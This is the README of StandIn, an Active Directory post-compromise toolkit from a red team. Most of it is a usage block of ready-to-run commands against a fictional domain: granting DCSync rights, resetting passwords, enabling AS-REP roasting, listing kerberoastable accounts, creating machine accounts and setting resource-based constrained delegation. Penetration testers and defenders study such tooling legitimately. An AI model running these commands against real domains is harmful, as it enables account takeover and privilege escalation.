StandIn is a small AD post-compromise toolkit. StandIn came about because recently at xforcered we needed a .NET native solution to perform resource-based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features.
I want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits into the AD post-exploitation toolchain.
Roadmap
Contributing
Contributions are most welcome. Please ensure pull requests include the following items: description of the functionality, brief technical explanation and sample output.
ToDo's
The following items are currently on the radar for implementation in subsequent versions of StandIn.
- Domain share enumeration. This can be split out into two parts, (1) finding and getting a unique list based on user home directories / script paths / profile paths and (2) querying fTDfs / msDFS-Linkv2 objects.
- Finding and parsing GPO's to map users to host local groups.
Subject References
- An ACE up the sleeve (by @_wald0 & @harmj0y)
- Kerberoasting (by @xpn)
- Roasting AS-REPs (by @harmj0y)
- Kerberos Unconstrained Delegation (by @spotheplanet)
- S4U2Pwnage (by @harmj0y)
- Resource-based Constrained Delegation (by @spotheplanet)
- Rubeus
- Powerview
- Powermad (by @kevin_robertson)
Index
- Help
- LDAP Object Operations
- ASREP
- SPN
- Unconstrained / constrained / resource-based constrained delegation
- DC's
- Groups Operations
- Machine Object Operations
- Detection
Help
```
StandIn v0.8 (~b33f)

 >--~~--> Args? <--~~--<

--help        This help menu
--object      LDAP filter, e.g. samaccountname=HWest
--computer    Machine name, e.g. Celephais-01
--group       Group name, e.g. "Necronomicon Admins"
--ntaccount   User name, e.g. "REDHOOK\UPickman"
--sid         String SID representing a target machine
--grant       User name, e.g. "REDHOOK\KMason"
--guid        Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
--domain      Domain name, e.g. REDHOOK
--user        User name
--pass        Password
--newpass     New password to set for object
--type        Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync
--spn         Boolean, list kerberoastable accounts
--delegation  Boolean, list accounts with unconstrained / constrained delegation
--asrep       Boolean, list ASREP roastable accounts
--dc          Boolean, list all domain controllers
--remove      Boolean, remove msDS-AllowedToActOnBehalfOfOtherIdentity property from machine object
--make        Boolean, make machine; ms-DS-MachineAccountQuota applies
--disable     Boolean, disable machine; should be the same user that created the machine
--access      Boolean, list access permissions for object
--delete      Boolean, delete machine from AD; requires elevated AD access

 >--~~--> Usage? <--~~--<

# Query object properties by LDAP filter
StandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))"
StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Query object access permissions, optionally filter by NTAccount
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --access
StandIn.exe --object samaccountname=Rllyeh$ --access --ntaccount "REDHOOK\EDerby"
StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Grant object access permissions
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSync
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Set object password
StandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!"
StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add ASREP to userAccountControl flags
StandIn.exe --object samaccountname=HArmitage --asrep
StandIn.exe --object samaccountname=FMorgan --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Remove ASREP from userAccountControl flags
StandIn.exe --object samaccountname=TMalone --asrep --remove
StandIn.exe --object samaccountname=RSuydam --asrep --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all ASREP roastable accounts
StandIn.exe --asrep
StandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all kerberoastable accounts
StandIn.exe --spn
StandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# List all accounts with unconstrained & constrained delegation privileges
StandIn.exe --delegation
StandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all domain controllers
StandIn.exe --dc

# List group members
StandIn.exe --group Literarum
StandIn.exe --group "Magna Ultima" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add user to group
StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley"
StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Create machine object
StandIn.exe --computer Innsmouth --make
StandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Disable machine object
StandIn.exe --computer Arkham --disable
StandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Delete machine object
StandIn.exe --computer Danvers --delete
StandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object properties
StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543
StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object properties
StandIn.exe --computer Miskatonic --remove
StandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
```
LDAP Object Operations
All object operations expect that the LDAP filter returns a single object and will exit out if your query returns more. This is by design.
Get object
Use Case
Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is a member of or when a user account last authenticated to the domain.